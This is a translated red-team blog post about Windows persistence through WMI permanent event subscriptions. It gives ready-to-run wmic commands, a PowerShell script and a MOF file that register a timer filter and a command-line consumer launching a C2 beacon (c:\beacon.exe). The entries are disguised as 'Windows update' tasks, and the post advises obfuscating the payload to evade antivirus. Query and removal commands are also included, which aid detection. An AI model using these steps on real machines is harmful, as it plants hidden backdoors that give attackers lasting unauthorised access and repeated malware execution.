WMI utilization
(permission maintenance)
Talk ahead
Author: pingpig@ dark blue attack and Defense Laboratory
After a brief understanding of WMI, we began to move horizontally, including information collection and tool utilization. So how can we persist the permission after we obtain the permission for a short time, that is, how can we maintain the permission? After reading some articles at home and abroad, the author found that WMI permission maintenance mainly introduces WMI events and divides them into permanent events and temporary events. This paper explains WMI events with reference to some blog articles. I hope to point out the deficiencies in time.
Related articles: WMI explanation (what is it, what to do, why)
WMI utilization (lateral movement)
What are WMI events
WMI events are notifications sent when the properties of a specific object change, including add, modify, and delete. You can use wmic to do this. Generally speaking, it can be said that any change in WMI is notified by WMI events. Event consumers in WMI events can be divided into temporary and permanent. Temporary event consumers only care about specific events and handle them during their operation. Permanent consumers are registered in the WMI namespace as instances of the class until it is unregistered. Therefore, in permission maintenance, we generally use WMI permanent events. Official explanation of WMI events and some blog explanations:
·WMI event notification
·Receive WMI events
Query event
List event filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
List event consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
List event bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Delete event
Delete event filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Event filter name'" | Remove-WmiObject -Verbose
Delete event consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Event consumer name'" | Remove-WmiObject -Verbose
Delete event binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Event binding name%'" | Remove-WmiObject -Verbose
WMI persistent events
Note: if there is no specified time for polling, WMI polling can be performed only after the machine is restarted. It should be noted that WMI can specify trigger conditions arbitrarily, such as user exit, creation and end of a program, etc.
wmic add permanent event
Register a WMI event filter
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BugSecFilter", EventNamespace = "root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'BugSecFilter'"
Register a WMI event consumer
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BugSecConsumer", CommandLineTemplate="cmd.exe /c c:\beacon.exe"
Bind event consumers to event filters
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter='\\.\root\subscription:__EventFilter.Name="BugSecFilter"', Consumer='\\.\root\subscription:CommandLineEventConsumer.Name="BugSecConsumer"'
Add persistent events to Powershell
Note: you can consider adding a Powershell time divider. If you need to go online to C2, replace the Payload with C2's exe or dll or ps1. Note: the parameters need to be modified
IntervalBetweenEvents ###Modification interval, in milliseconds. $EventFilterArgs Medium Name ###Modify the filter name. Query ###Modify the WQL statement in the following script, but the TimerID must match the parameters in $timeargs. $FinalPayload ###Modify the Payload to specify the execution of Powershell, cmd or other commands. $CommandLineConsumerArgs Medium Name ###Modify the consumer name.
$TimerArgs = @{
IntervalBetweenEvents = ([UInt32] 2000) # 30 min
SkipIfPassed = $False
TimerId ="Trigger" };
$EventFilterArgs = @{
EventNamespace = 'root/cimv2'
Name = "Windows update trigger"
Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Trigger'"
QueryLanguage = 'WQL' };
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs;
$FinalPayload = 'cmd.exe /c c:\beacon.exe'
$CommandLineConsumerArgs = @{
Name = "Windows update consumer"
CommandLineTemplate = $FinalPayload};
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs;
$FilterToConsumerArgs = @{
Filter = $Filter
Consumer = $Consumer};
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs;Note: for the WQL statement in the above script, you can also specify with to specify the interval in seconds, but you need to specify the TimerID in advance. You can modify the PS1 script to improve it. The operations of adding and deleting backdoors can be integrated into one script. At the same time, the killing free operations can be confused or coded.
SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'Trigger'
Online C2
Note: replace the Payload of the above Powershell script for local execution, save it as ps1 format, and modify its polling time. If you want to make it a remote download format, you need to do a kill free operation on Powershell.
After running ps1 script, it went online successfully
Mof file add event
Note: when adding events to Mof files, the author can add events normally after compilation, but fails to execute the specified command.
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{
Name = "test1comsumer";
RunInteractively=false;
CommandLineTemplate="cmd.exe /c c:\beacon.exe";
};
instance of __EventFilter as $Filt
{
Name = "test1filter";
EventNamespace = "root\\cimv2";
Query ="SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'test1filter'";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding
{
Filter = $Filt;
Consumer = $Cons;
};compile
mofcomp.exe wmi.mof
Event added successfully
reference resources: https://github.com/AxelPotato/WMI